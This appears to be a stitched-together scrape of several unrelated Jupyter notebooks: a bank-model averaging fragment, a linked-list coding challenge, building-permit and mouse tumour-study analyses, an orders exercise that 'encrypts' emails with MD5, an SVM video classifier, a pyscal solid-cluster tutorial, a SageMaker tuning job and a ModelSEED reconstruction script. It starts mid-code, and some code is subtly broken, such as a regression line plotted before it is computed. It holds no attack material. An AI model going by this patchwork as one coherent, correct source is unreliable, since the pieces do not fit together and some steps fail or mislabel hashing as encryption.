timeout_secs=5
)
local_american_bank_model = models[1].get(
request_block=True,
name="model_download",
reason="test evaluation",
timeout_secs=5
)
local_australian_bank_model = models[2].get(
request_block=True,
name="model_download",
reason="test evaluation",
timeout_secs=5
)
```
### Average the three models into on local model
```
with torch.no_grad():
local_model.lr.weight.set_(((local_portuguese_bank_model.lr.weight.data + local_american_bank_model.lr.weight.data + local_australian_bank_model.lr.weight.data) / 3))
local_model.lr.bias.set_(((local_portuguese_bank_model.lr.bias.data + local_american_bank_model.lr.bias.data + local_australian_bank_model.lr.bias.data) / 3))
```
## Test the accuracy on the test set
```
def accuracy(model, x, y):
out = model(x)
correct = torch.abs(y - out) < 0.5
return correct.float().mean()
plain_accuracy = accuracy(local_model, test_data, test_target)
print(f"Accuracy on plain test_set: {plain_accuracy}")
```
|
github_jupyter
|
This notebook was prepared by [Donne Martin](http://donnemartin.com). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges).
# Challenge Notebook
## Problem: Find the kth to last element of a linked list.
* [Constraints](#Constraints)
* [Test Cases](#Test-Cases)
* [Algorithm](#Algorithm)
* [Code](#Code)
* [Unit Test](#Unit-Test)
* [Solution Notebook](#Solution-Notebook)
## Constraints
* Can we assume this is a non-circular, singly linked list?
* Yes
* Can we assume k is a valid integer?
* Yes
* If k = 0, does this return the last element?
* Yes
* What happens if k is greater than or equal to the length of the linked list?
* Return None
* Can you use additional data structures?
* No
* Can we assume we already have a linked list class that can be used for this problem?
* Yes
## Test Cases
* Empty list -> None
* k is >= the length of the linked list -> None
* One element, k = 0 -> element
* General case with many elements, k < length of linked list
## Algorithm
Refer to the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/linked_lists/kth_to_last_elem/kth_to_last_elem_solution.ipynb). If you are stuck and need a hint, the solution notebook's algorithm discussion might be a good place to start.
## Code
```
%run ../linked_list/linked_list.py
%load ../linked_list/linked_list.py
class MyLinkedList(LinkedList):
def kth_to_last_elem(self, k):
# TODO: Implement me
pass
```
## Unit Test
**The following unit test is expected to fail until you solve the challenge.**
```
# %load test_kth_to_last_elem.py
import unittest
class Test(unittest.TestCase):
def test_kth_to_last_elem(self):
print('Test: Empty list')
linked_list = MyLinkedList(None)
self.assertEqual(linked_list.kth_to_last_elem(0), None)
print('Test: k >= len(list)')
self.assertEqual(linked_list.kth_to_last_elem(100), None)
print('Test: One element, k = 0')
head = Node(2)
linked_list = MyLinkedList(head)
self.assertEqual(linked_list.kth_to_last_elem(0), 2)
print('Test: General case')
linked_list.insert_to_front(1)
linked_list.insert_to_front(3)
linked_list.insert_to_front(5)
linked_list.insert_to_front(7)
self.assertEqual(linked_list.kth_to_last_elem(2), 3)
print('Success: test_kth_to_last_elem')
def main():
test = Test()
test.test_kth_to_last_elem()
if __name__ == '__main__':
main()
```
## Solution Notebook
Review the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/linked_lists/kth_to_last_elem/kth_to_last_elem_solution.ipynb) for a discussion on algorithms and code solutions.
|
github_jupyter
|
```
# import data science libraries
import numpy as np
import pandas as pd
import re
import os.path
from os import path
from datetime import datetime
%matplotlib inline
import matplotlib.pyplot as plt
import seaborn as sns
from scipy import stats
from sklearn.preprocessing import MinMaxScaler, StandardScaler, PowerTransformer
from sklearn.cluster import KMeans
import wrangle as wr
import preprocessing_permits as pr
import explore as ex
import model as mo
import warnings
warnings.filterwarnings("ignore")
# global setting for DataFrames and visualizations
pd.set_option("display.max_columns", None)
plt.rc("figure", figsize=(16, 8))
sns.set_palette("colorblind")
df = wr.acquire_building_permits()
print(f"""Our DataFrame contains {df.shape[0]:,} observations and {df.shape[1]} features.""")
df
df["city"] = df.cbsa_name.str.split(" ", 1, expand = True)[0]
df["state"] = df.cbsa_name.str.split(" ", 1, expand = True)[1]
df["major_city"] = df.city.str.split("-", 1, expand=True)[0]
df["major_state"] = df.state.str.split("-", 1, expand=True)[0]
df["metropolitan_area"] = df.state.str.split("-", 1, expand=True)[1]
df["metropolitan_area"] = df.major_state.str.split(" ", 1, expand=True)[1]
df["major_state"] = df.major_state.str.split(" ", 1, expand=True)[0]
df[(df.major_city == "York") & (df.major_state == "PA")]
df = wr.prep_building_permits(df)
print(f"""Our DataFrame contains {df.shape[0]:,} observations and {df.shape[1]} features.""")
df
df[(df.major_city == "York") & (df.major_state == "PA")]
df[(df.major_city == "Baltimore") & (df.major_state == "MD")]
df.head(46)
df = pr.get_permits_model_df()
print(f"""Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features""")
df.head(46)
df["alec_test"] = (
df.sort_values(["year"])
.groupby(["city", "state"])[["total_high_density_value"]]
.pct_change()
)
df.tail(46)
df["new_field"] = df.sort_values(["year"]).groupby(["city", "state", "year"])[["total_high_density_value"]].pct_change()
(7485000.0 - 4566000.0) / 4566000.0
(12492000.0 - 30583000.0) / 30583000.0
(1 + 2.034637) / (1 + 0.231085)
df = pr.add_new_features(df)
print(f"""Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features""")
df.head(46)
(1 + -0.379118) / (1 + 0.062322)
df.groupby("year").total_high_density_value.sum()
df.sample()
df.iloc[545:550]
(4.928300e+10 - 5.200240e+10) / 5.200240e+10
(217714000 - 473328000.0) / 473328000.0
(1 + 0.578019) / (1 + 0.313639)
df = pr.filter_top_cities_building_permits(df)
print(f"""Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features""")
df.tail()
(4.928300e+10 - 5.200240e+10) / 5.200240e+10
(1 + -0.508320) / (1 + -0.052294)
df.groupby("year").total_high_density_value.sum()
```
|
github_jupyter
|
## Observations and Insights
```
# Dependencies and Setup
import matplotlib.pyplot as plt
import pandas as pd
import scipy.stats as st
import numpy as np
from scipy.stats import linregress
# Study data files
mouse_metadata_path = "data/Mouse_metadata.csv"
study_results_path = "data/Study_results.csv"
# Read the mouse data and the study results
mouse_metadata = pd.read_csv(mouse_metadata_path)
study_results = pd.read_csv(study_results_path)
#looking at the data
# mouse_metadata.head(20)
# study_results.head(20)
#putting data together
all_mouse_data = mouse_metadata.merge(study_results, on='Mouse ID')
all_mouse_data.head()
# Checking the number of mice.
mouse_count = len(all_mouse_data["Mouse ID"].unique())
mouse_count
# Getting the duplicate mice by ID number that shows up for Mouse ID and Timepoint.
all_dups = len(all_mouse_data["Mouse ID"])- mouse_count
all_dups
# Optional: Get all the data for the duplicate mouse ID.
all_counts = all_dups + mouse_count
all_counts
# Find the duplicate mouse
duplicate_mouse = all_mouse_data.loc[all_mouse_data.duplicated(subset=['Mouse ID', 'Timepoint']), 'Mouse ID'].unique()
duplicate_mouse[0]
# Create a clean DataFrame by dropping the duplicate mouse by its ID.
analysis_df = all_mouse_data[all_mouse_data['Mouse ID'].isin(duplicate_mouse) == False]
analysis_df.head()
# Checking the number of mice in the clean DataFrame.
mouse_count2 = len(analysis_df["Mouse ID"].unique())
mouse_count2
```
## Summary Statistics
```
# Generate a summary statistics table of mean, median, variance, standard deviation, and SEM of the tumor volume for each regimen
# This method is the most straighforward, creating multiple series and putting them all together at the end.
regimen_df = analysis_df.copy().groupby('Drug Regimen')
mean = regimen_df.mean()['Tumor Volume (mm3)']
median = regimen_df.median()['Tumor Volume (mm3)']
variance = regimen_df.var()['Tumor Volume (mm3)']
std_deviation = regimen_df.std()['Tumor Volume (mm3)']
sem = regimen_df.sem()['Tumor Volume (mm3)']
summary_table = pd.DataFrame({
'Mean Volume': mean,
'Median Volume': median,
'Volume Variance': variance,
'Volume Std': std_deviation,
'Volume Std Err': sem
})
summary_table
# Generate a summary statistics table of mean, median, variance, standard deviation,
# and SEM of the tumor volume for each regimen
# This method produces everything in a single groupby function
analysis_df.groupby('Drug Regimen').agg({
'Tumor Volume (mm3)': ['mean', 'median', 'var', 'std', 'sem']
})
```
## Bar and Pie Charts
```
# Generate a bar plot showing the total number of mice for each treatment throughout the course of the study using pandas.
pandas_bar = analysis_df['Drug Regimen'].value_counts().plot(kind='bar', color = 'pink', title="Mouse Count Per Treatment")
# Generate a bar plot showing the total number of mice for each treatment throughout the course of the study using pyplot.
x_values = analysis_df['Drug Regimen'].unique()
plt.bar(x=x_values, height=analysis_df['Drug Regimen'].value_counts().values, color="pink", width=0.5)
plt.xticks(rotation=90)
plt.title("Mouse Count Per Treatment")
plt.show()
# Generate a pie plot showing the distribution of female versus male mice using pandas
gender_dist = analysis_df['Sex'].value_counts()
gender_pie = gender_dist.plot(kind='pie', colors = ["purple", "pink"], title= "Gender Distibution", legend=True)
# Generate a pie plot showing the distribution of female versus male mice using pyplot
gender_counts = analysis_df['Sex'].value_counts()
plt.pie(gender_counts, labels=gender_dist.index, colors=["purple", "pink"])
plt.title('Gender Distribution')
plt.legend()
plt.ylabel("Sex")
plt.show()
```
## Quartiles, Outliers and Boxplots
```
# Start by getting the last (greatest) timepoint for each mouse
# Using reset_index will return the series as a dataframe
max_df = analysis_df.groupby('Mouse ID')['Timepoint'].max().reset_index()
max_df
# Merge this group df with the original dataframe to get the tumor volume at the last timepoint
max_merge = analysis_df.merge(max_df, on=['Mouse ID', 'Timepoint'])
max_merge
# Put treatments into a list for for loop (and later for plot labels)
treatments = ["Capomulin", "Ramicane", "Infubinol", "Ceftamin"]
# Create empty list to fill with tumor vol data (for plotting)
tumor_vol = []
# Calculate the IQR and quantitatively determine if there are any potential outliers.
# Locate the rows which contain mice on each drug and get the tumor volumes
# Determine outliers using upper and lower bounds
for treatment in treatments:
final_volume = (max_merge.loc[max_merge["Drug Regimen"]== treatment, "Tumor Volume (mm3)"])
quartiles = np.quantile(final_volume, [0.25, 0.50, 0.75])
lowerq = quartiles[0]
higherq = quartiles[2]
median = quartiles[1]
iqr = higherq - lowerq
lower_bound = lowerq - (1.5 * iqr)
upper_bound = higherq + (1.5 * iqr)
print(f'Quartile Data for {treatment}:')
print("------------------------------------------")
print(f'Lower Quartile of Tumor Volumes: {round(lowerq, 2)}')
print(f'Upper Quartile of Tumor Volmes: {round(higherq, 2)}')
print(f'Inner Quartile Range is: {round(iqr, 2)}')
print(f'Values below {round(lower_bound, 2)} could be outliers, and values above {round(upper_bound, 2)} could be outliers')
print("------------------------------------------")
tumor_vol.append(final_volume)
# Generate a box plot of the final tumor volume of each mouse across four regimens of interest
pink_square = dict(markerfacecolor='pink', marker='s')
fig, ax1 = plt.subplots()
ax1.set_title("Tumor Volume Across Four Regimens of Interest")
ax1.set_ylabel("Volume")
ax1.set_xlabel("Treatments")
ax1.boxplot(tumor_vol, flierprops=pink_square )
ax1.set_xticklabels(["Capomulin", "Ramicane", "Infubinol", "Ceftamin"])
plt.show()
```
## Line and Scatter Plots
```
rando_mouse_df = analysis_df.loc[analysis_df['Drug Regimen']== "Capomulin",:]
rando_mouse_df = rando_mouse_df.loc[rando_mouse_df["Mouse ID"]=="s185",:]
# Generate a line plot of time point versus tumor volume for a mouse treated with Capomulin
plt.plot(rando_mouse_df["Tumor Volume (mm3)"], rando_mouse_df["Timepoint"], marker = "o", color="purple")
plt.xlabel('Average Tumor Volume')
plt.ylabel('Timepoints')
plt.title("Tumor Volume vs Time for Mouse s185")
plt.show()
# Generate a scatter plot of mouse weight versus average tumor volume for the Capomulin regimen
capomulin_df = analysis_df.copy().loc[analysis_df['Drug Regimen']== "Capomulin",:]
capomulin_df = capomulin_df.groupby("Mouse ID")
avg_vol = capomulin_df["Tumor Volume (mm3)"].mean()
mouse_weight = capomulin_df["Weight (g)"].unique().astype(int)
plt.scatter(avg_vol, mouse_weight, color="hotpink")
plt.xlabel('Average Tumor Volume')
plt.ylabel('Mouse Weight (g)')
plt.plot(x_values,regress_values,"r-", color='purple')
plt.title("Tumor Volume vs Weight")
plt.show()
```
## Correlation and Regression
```
# Calculate the correlation coefficient and linear regression model
# for mouse weight and average tumor volume for the Capomulin regimen
x_values = avg_vol
y_values = mouse_weight
(slope, intercept, rvalue, pvalue, stderr) = linregress(x_values, y_values)
regress_values = x_values * slope + intercept
line_eq = "y = " + str(round(slope,2)) + "x + " + str(round(intercept,2))
correlation = st.pearsonr(avg_vol, mouse_weight)
print(f'The equation of the line is {line_eq}, and the correlation coefficient is {round(correlation[0],2)}.')
print('This indicates a strong relationship between weight and tumor volume.')
```
|
github_jupyter
|
```
# importing the packages
import pandas as pd
import numpy as np
# reading the csv files
orders = pd.read_csv('orders_test (2).csv')
stores = pd.read_csv('store_test (2).csv')
customers = pd.read_csv('customer_test (2).csv')
```
1. Create a CSV containing an aggregate table showing the total orders and revenue
each store had each month. It should have the following columns:
Year (Eg: 2020)
Month (Eg: January)
Store Name
Number of Orders
Total Revenue
```
# renaming, creating, merging columns as per required output
stores.rename(columns={'id':'store_id'},inplace=True)
orders['order_date'] = pd.to_datetime(orders['order_date'])
orders['Year'] = orders['order_date'].apply(lambda x : x.strftime('%Y'))
orders['Month'] = orders['order_date'].apply(lambda x : x.strftime('%B'))
store_orders = stores.merge(orders, on=['store_id'], how = 'left')
store_orders.groupby(['name','Year','Month']).agg({'id':'count','total':'sum'}).reset_index().rename(columns={
'name':'Store Name','id':'Number of Orders','total':'Total revenue'})
# storing the csv for question 1 reesults
Q1 = store_orders.groupby(['name','Year','Month']).agg({'id':'count','total':'sum'}).reset_index().rename(columns={
'name':'Store Name','id':'Number of Orders','total':'Total revenue'})
Q1.to_csv('Q1.csv')
```
2. Create a CSV containing a list of users who have placed less than 10 orders. It should have the following columns:
First Name
Last Name
Email
Orders Placed by user
```
# renaming, merging columns as per required output
customers.rename(columns={'id':'customer_id'},inplace=True)
customer_orders = customers.merge(orders,on='customer_id',how='left')
customers_with_orders = customer_orders.groupby(['first_name','last_name','email']).agg({'id':'count'}).reset_index().rename(
columns={'first_name':'First Name','last_name':'Last Name','email':'Email','id':'Orders Placed by user'})
# pulling customer info who has ordered less than 10 orders
customers_with_lt_10_orders = customers_with_orders[customers_with_orders['Orders Placed by user'] < 10]
customers_with_lt_10_orders
# saving the results of Q2
customers_with_lt_10_orders.to_csv('Q2.csv')
```
3. In question 2, use a MD5 hash to encrypt the emails of the users before converting it to CSV.
```
# importing the hash library
import hashlib
# hasing the Email information of customer
customers_with_lt_10_orders['Email']=customers_with_lt_10_orders.Email.apply(lambda x: hashlib.md5(x.encode()).hexdigest())
customers_with_lt_10_orders
# stroing the customer order info with hashed Email information
customers_with_lt_10_orders.to_csv('Q3.csv')
```
|
github_jupyter
|
```
#!/bin/python
import numpy as np
import pandas as pd
import os
import pickle
import sys
import scipy
from pathlib import Path
from collections import Counter
import random
import copy
# Machine Learning libraries
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn import svm
from sklearn import metrics
from sklearn import preprocessing
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.metrics import average_precision_score
#m_trn_file_path = "../cnn_bow/cnn_trn.csv"
#m_val_file_path = "../cnn_bow/cnn_val.csv"
#m_test_file_path = "../cnn_bow/cnn_test.csv"
m_trn_file_path = "../surf_bow/surf_1000_trn.csv"
m_val_file_path = "../surf_bow/surf_1000_val.csv"
m_test_file_path = "../surf_bow/surf_1000_test.csv"
#a_train_df = pd.read_csv(a_trn_file_path, index_col='Unnamed: 0')
#a_train_df.drop(['target', 'name'], axis=1, inplace=True)
m_train_df = pd.read_csv(m_trn_file_path, index_col='Unnamed: 0')
m_train_df.drop(['name'], axis=1, inplace=True)
train_df = m_train_df
train_df.target.fillna('P000', inplace=True)
train_df.fillna(0.0, inplace=True)
### tf_idf conversion
# 1. Save target column, and drop if from dataframe
train_df_target = pd.DataFrame(train_df['target'], columns=['target'])
train_df.drop(['target'], axis=1, inplace=True )
# 2. Replace frequencies with tf_idf scores
tf_transformer = TfidfTransformer(use_idf=True).fit(train_df)
X_train_tf = tf_transformer.transform(train_df)
train_df = pd.DataFrame(X_train_tf.todense(), columns=train_df.columns.values)
# 3. Add back the target column
train_df = pd.concat([train_df, train_df_target], axis=1)
#a_test_df = pd.read_csv(a_val_file_path, index_col='Unnamed: 0')
#a_test_df.drop(['target', 'name'], axis=1, inplace=True)
m_test_df = pd.read_csv(m_val_file_path, index_col='Unnamed: 0')
m_test_df.drop(['name'], axis=1, inplace=True )
#test_df = pd.concat([a_test_df, m_test_df], axis=1)
test_df = m_test_df
test_df.target.fillna('P000', inplace=True)
test_df.fillna(0.0, inplace=True)
### tf_idf conversion
# 1. Save target column, and drop if from dataframe
test_df_target = pd.DataFrame(test_df['target'], columns=['target'])
test_df.drop(['target'], axis=1, inplace=True )
# 2. Replace frequencies with tf_idf scores
tf_transformer = TfidfTransformer(use_idf=True).fit(test_df)
X_train_tf = tf_transformer.transform(test_df)
test_df = pd.DataFrame(X_train_tf.todense(), columns=test_df.columns.values)
# 3. Add back the target column
test_df = pd.concat([test_df, test_df_target], axis=1)
# Machine Learning
prediction_var = list(train_df.columns)
prediction_var.remove('target')
#prediction_var.remove('name')
# Get input training data
train_X = train_df[prediction_var]
# Get input target variable
train_y = train_df.target
print(train_X.shape)
print(train_y.shape)
# Machine Learning
prediction_var = list(test_df.columns)
prediction_var.remove('target')
# Get test data feature
test_X = test_df[prediction_var]
# Get test data target
test_y = test_df.target
print(test_X.shape)
print(test_y.shape)
# class_weight='balanced',decision_function_shape = 'ovr',
dict_weights = {'P000':0.0000001, 'P001': 97, 'P002': 24, 'P003': 54}
clf = svm.SVC(gamma='scale', probability=True, class_weight=dict_weights,decision_function_shape = 'ovr')
# Fit the model to training
clf.fit(train_X,train_y)
# Check prediction accuracy
prediction = clf.decision_function(test_X)
prob_list = prediction[:,1]
x = np.array([test_y == 'P001'][0]).astype(int)
print('P001 &', round(average_precision_score(x,prob_list, pos_label=1),4))
prob_list = prediction[:,2]
x = np.array([test_y == 'P002'][0]).astype(int)
print('P002 &', round(average_precision_score(x,prob_list, pos_label=1),4))
prob_list = prediction[:,3]
x = np.array([test_y == 'P003'][0]).astype(int)
print('P003 &', round(average_precision_score(x,prob_list, pos_label=1),4))
# Train on validation also, for the Canvas submission
m_train_df = pd.read_csv(m_trn_file_path, index_col='Unnamed: 0')
m_train_df.drop(['name'], axis=1, inplace=True)
m_test_df = pd.read_csv(m_val_file_path, index_col='Unnamed: 0')
m_test_df.drop(['name'], axis=1, inplace=True )
train_df = m_train_df
train_df.target.fillna('P000', inplace=True)
train_df.fillna(0.0, inplace=True)
test_df = m_test_df
test_df.target.fillna('P000', inplace=True)
test_df.fillna(0.0, inplace=True)
train_df = train_df.append(test_df, ignore_index=True)
### tf_idf conversion
# 1. Save target column, and drop if from dataframe
train_df_target = pd.DataFrame(train_df['target'], columns=['target'])
train_df.drop(['target'], axis=1, inplace=True )
# 2. Replace frequencies with tf_idf scores
tf_transformer = TfidfTransformer(use_idf=True).fit(train_df)
X_train_tf = tf_transformer.transform(train_df)
train_df = pd.DataFrame(X_train_tf.todense(), columns=train_df.columns.values)
# 3. Add back the target column
train_df = pd.concat([train_df, train_df_target], axis=1)
# Get input training data
train_X = train_df[prediction_var]
# Get input target variable
train_y = train_df.target
m_test_df = pd.read_csv(m_test_file_path, index_col='Unnamed: 0')
name_list = m_test_df['name']
m_test_df.drop(['name'], axis=1, inplace=True )
test_df = m_test_df
test_df.target.fillna('P000', inplace=True)
test_df.fillna(0.0, inplace=True)
# Machine Learning
prediction_var = list(test_df.columns)
prediction_var.remove('target')
# Get test data features
test_X = test_df[prediction_var]
# Get test data target
test_y = test_df.target
clf = svm.SVC(gamma='scale', probability=True, class_weight=dict_weights,decision_function_shape = 'ovr')
# Fit the model to training
clf.fit(train_X,train_y)
with open("../../all_test.video", "r") as f:
video_list = f.readlines()
# Check prediction accuracy
prediction = clf.decision_function(test_X)
prob_list = prediction[:,1]
output_df = pd.DataFrame({"VideoID":name_list, "Label":prob_list})
output_df = output_df.set_index('VideoID')
dict1 = output_df.to_dict('index')
res = []
for line in video_list:
vid = line.strip("\n")
if(vid in dict1):
res.append(dict1[vid]['Label'])
else:
res.append(0.0)
res = pd.DataFrame(res, columns=None)
res.to_csv(path_or_buf="../scores/" + str('P001')+"_cnn.csv", index=False)
prob_list = prediction[:,2]
output_df = pd.DataFrame({"VideoID":name_list, "Label":prob_list})
output_df = output_df.set_index('VideoID')
dict1 = output_df.to_dict('index')
res = []
for line in video_list:
vid = line.strip("\n")
if(vid in dict1):
res.append(dict1[vid]['Label'])
else:
res.append(0.0)
res = pd.DataFrame(res, columns=None)
res.to_csv(path_or_buf="../scores/" + str('P002')+"_cnn.csv", index=False)
prob_list = prediction[:,3]
output_df = pd.DataFrame({"VideoID":name_list, "Label":prob_list})
output_df = output_df.set_index('VideoID')
dict1 = output_df.to_dict('index')
res = []
for line in video_list:
vid = line.strip("\n")
if(vid in dict1):
res.append(dict1[vid]['Label'])
else:
res.append(0.0)
res = pd.DataFrame(res, columns=None)
res.to_csv(path_or_buf="../scores/" + str('P003')+"_cnn.csv", index=False)
```
|
github_jupyter
|
## Distinction of solid liquid atoms and clustering
In this example, we will take one snapshot from a molecular dynamics simulation which has a solid cluster in liquid. The task is to identify solid atoms and cluster them. More details about the method can be found [here](https://pyscal.readthedocs.io/en/latest/solidliquid.html).
The first step is, of course, importing all the necessary module. For visualisation, we will use [Ovito](https://www.ovito.org/).

The above image shows a visualisation of the system using Ovito. Importing modules,
```
import pyscal.core as pc
```
Now we will set up a System with this input file, and calculate neighbors. Here we will use a cutoff method to find neighbors. More details about finding neighbors can be found [here](https://pyscal.readthedocs.io/en/latest/nearestneighbormethods.html#).
```
sys = pc.System()
sys.read_inputfile('cluster.dump')
sys.find_neighbors(method='cutoff', cutoff=3.63)
```
Once we compute the neighbors, the next step is to find solid atoms. This can be done using [System.find_solids](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.find_solids) method. There are few parameters that can be set, which can be found in detail [here](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.find_solids).
```
sys.find_solids(bonds=6, threshold=0.5, avgthreshold=0.6, cluster=False)
```
The above statement found all the solid atoms. Solid atoms can be identified by the value of the `solid` attribute. For that we first get the atom objects and select those with `solid` value as True.
```
atoms = sys.atoms
solids = [atom for atom in atoms if atom.solid]
len(solids)
```
There are 202 solid atoms in the system. In order to visualise in Ovito, we need to first write it out to a trajectory file. This can be done with the help of [to_file](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.to_file) method of System. This method can help to save any attribute of the atom or ant Steinhardt parameter value.
```
sys.to_file('sys.solid.dat', custom = ['solid'])
```
We can now visualise this file in Ovito. After opening the file in Ovito, the modifier [compute property](https://ovito.org/manual/particles.modifiers.compute_property.html) can be selected. The `Output property` should be `selection` and in the expression field, `solid==0` can be selected to select all the non solid atoms. Applying a modifier [delete selected particles](https://ovito.org/manual/particles.modifiers.delete_selected_particles.html) can be applied to delete all the non solid particles. The system after removing all the liquid atoms is shown below.

### Clustering algorithm
You can see that there is a cluster of atom. The clustering functions that pyscal offers helps in this regard. If you used `find_clusters` with `cluster=True`, the clustering is carried out. Since we did used `cluster=False` above, we will rerun the function
```
sys.find_solids(bonds=6, threshold=0.5, avgthreshold=0.6, cluster=True)
```
You can see that the above function call returned the number of atoms belonging to the largest cluster as an output. In order to extract atoms that belong to the largest cluster, we can use the `largest_cluster` attribute of the atom.
```
atoms = sys.atoms
largest_cluster = [atom for atom in atoms if atom.largest_cluster]
len(largest_cluster)
```
The value matches that given by the function. Once again we will save this information to a file and visualise it in Ovito.
```
sys.to_file('sys.cluster.dat', custom = ['solid', 'largest_cluster'])
```
The system visualised in Ovito following similar steps as above is shown below.

It is clear from the image that the largest cluster of solid atoms was successfully identified. Clustering can be done over any property. The following example with the same system will illustrate this.
## Clustering based on a custom property
In pyscal, clustering can be done based on any property. The following example illustrates this. To find the clusters based on a custom property, the [System.clusters_atoms](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.cluster_atoms) method has to be used. The simulation box shown above has the centre roughly at (25, 25, 25). For the custom clustering, we will cluster all atoms within a distance of 10 from the the rough centre of the box at (25, 25, 25). Let us define a function that checks the above condition.
```
def check_distance(atom):
#get position of atom
pos = atom.pos
#calculate distance from (25, 25, 25)
dist = ((pos[0]-25)**2 + (pos[1]-25)**2 + (pos[2]-25)**2)**0.5
#check if dist < 10
return (dist <= 10)
```
The above function would return True or False depending on a condition and takes the Atom as an argument. These are the two important conditions to be satisfied. Now we can pass this function to cluster. First, set up the system and find the neighbors.
```
sys = pc.System()
sys.read_inputfile('cluster.dump')
sys.find_neighbors(method='cutoff', cutoff=3.63)
```
Now cluster
```
sys.cluster_atoms(check_distance)
```
There are 242 atoms in the cluster! Once again we can check this, save to a file and visualise in ovito.
```
atoms = sys.atoms
largest_cluster = [atom for atom in atoms if atom.largest_cluster]
len(largest_cluster)
sys.to_file('sys.dist.dat', custom = ['solid', 'largest_cluster'])
```

This example illustrates that any property can be used to cluster the atoms!
|
github_jupyter
|
## Download the Fashion-MNIST dataset
```
import os
import numpy as np
from tensorflow.keras.datasets import fashion_mnist
(x_train, y_train), (x_val, y_val) = fashion_mnist.load_data()
os.makedirs("./data", exist_ok = True)
np.savez('./data/training', image=x_train, label=y_train)
np.savez('./data/validation', image=x_val, label=y_val)
!pygmentize fmnist-3.py
```
## Upload Fashion-MNIST data to S3
```
import sagemaker
print(sagemaker.__version__)
sess = sagemaker.Session()
role = sagemaker.get_execution_role()
bucket = sess.default_bucket()
prefix = 'keras2-fashion-mnist'
training_input_path = sess.upload_data('data/training.npz', key_prefix=prefix+'/training')
validation_input_path = sess.upload_data('data/validation.npz', key_prefix=prefix+'/validation')
output_path = 's3://{}/{}/output/'.format(bucket, prefix)
chk_path = 's3://{}/{}/checkpoints/'.format(bucket, prefix)
print(training_input_path)
print(validation_input_path)
print(output_path)
print(chk_path)
```
## Train with Tensorflow
```
from sagemaker.tensorflow import TensorFlow
tf_estimator = TensorFlow(entry_point='fmnist-3.py',
role=role,
instance_count=1,
instance_type='ml.p3.2xlarge',
framework_version='2.1.0',
py_version='py3',
hyperparameters={'epochs': 60},
output_path=output_path,
use_spot_instances=True,
max_run=3600,
max_wait=7200)
objective_metric_name = 'val_acc'
objective_type = 'Maximize'
metric_definitions = [
{'Name': 'val_acc', 'Regex': 'Best val_accuracy: ([0-9\\.]+)'}
]
from sagemaker.tuner import ContinuousParameter, IntegerParameter
hyperparameter_ranges = {
'learning_rate': ContinuousParameter(0.001, 0.2, scaling_type='Logarithmic'),
'batch-size': IntegerParameter(32,512)
}
from sagemaker.tuner import HyperparameterTuner
tuner = HyperparameterTuner(tf_estimator,
objective_metric_name,
hyperparameter_ranges,
metric_definitions=metric_definitions,
objective_type=objective_type,
max_jobs=60,
max_parallel_jobs=2,
early_stopping_type='Auto')
tuner.fit({'training': training_input_path, 'validation': validation_input_path})
from sagemaker.analytics import HyperparameterTuningJobAnalytics
exp = HyperparameterTuningJobAnalytics(
hyperparameter_tuning_job_name=tuner.latest_tuning_job.name)
jobs = exp.dataframe()
jobs.sort_values('FinalObjectiveValue', ascending=0)
```
## Deploy
```
import time
tf_endpoint_name = 'keras-tf-fmnist-'+time.strftime("%Y-%m-%d-%H-%M-%S", time.gmtime())
tf_predictor = tuner.deploy(
initial_instance_count=1,
instance_type='ml.m5.large',
endpoint_name=tf_endpoint_name)
```
## Predict
```
%matplotlib inline
import random
import matplotlib.pyplot as plt
num_samples = 5
indices = random.sample(range(x_val.shape[0] - 1), num_samples)
images = x_val[indices]/255
labels = y_val[indices]
for i in range(num_samples):
plt.subplot(1,num_samples,i+1)
plt.imshow(images[i].reshape(28, 28), cmap='gray')
plt.title(labels[i])
plt.axis('off')
payload = images.reshape(num_samples, 28, 28, 1)
response = tf_predictor.predict(payload)
prediction = np.array(response['predictions'])
predicted_label = prediction.argmax(axis=1)
print('Predicted labels are: {}'.format(predicted_label))
```
## Clean up
```
tf_predictor.delete_endpoint()
```
|
github_jupyter
|
```
import mackinac
import cobra
import pandas as pd
import json
import os
import numpy as np
# load ID's for each organisms genome
id_table = pd.read_table('../data/study_strain_subset_w_patric.tsv',sep='\t',dtype=str)
id_table = id_table.replace(np.nan, '', regex=True)
species_to_id = dict(zip(id_table["designation in screen"],id_table["PATRIC genome ID"]))
id_table
mackinac.get_token('gregmedlock_seed')
# grab and save a universal model to be used later for gapfilling. This is a public template available in Mike Mundy's workspace.
# The template says "gramneg", but there is no difference between the g+ and g- templates other than biomass composition,
# which will not be used during gapfilling (the GENREs will already have their own biomass function).
gramneg = mackinac.create_universal_model('/mmundy/public/modelsupport/templates/MicrobialNegativeResolved.modeltemplate')
cobra.io.save_json_model(gramneg,'../data/universal_mundy.json')
# save id's and both names in dictionary
name_to_recon_info = {}
name_to_gapfill_solution = {}
for species in species_to_id.keys():
# Check for an existing GENRE and make sure there is a PATRIC ID for the strain--
# if there is no PATRIC ID, the dictionary will have an empty string for that strain.
if species+'.json' not in os.listdir('../data/modelseed_models') and species_to_id[species]:
species_id = species_to_id[species]
# reconstruct model; function returns a dictionary with reconstruction info, NOT the model
print("Reconstructing GENRE for " + species)
recon_info = mackinac.create_patric_model(species_id,species)
name_to_recon_info[species] = recon_info
# Get the reactions contained in the gapfill solution. This is on complete media
name_to_gapfill_solution[species] = mackinac.get_patric_gapfill_solutions(species)[0]
# convert to a cobra model
model = mackinac.create_cobra_model_from_patric_model(species)
# Save model in json format
cobra.io.save_json_model(model, '../data/modelseed_models/'+species+'.json')
# Save the model with gapfilled reactions removed
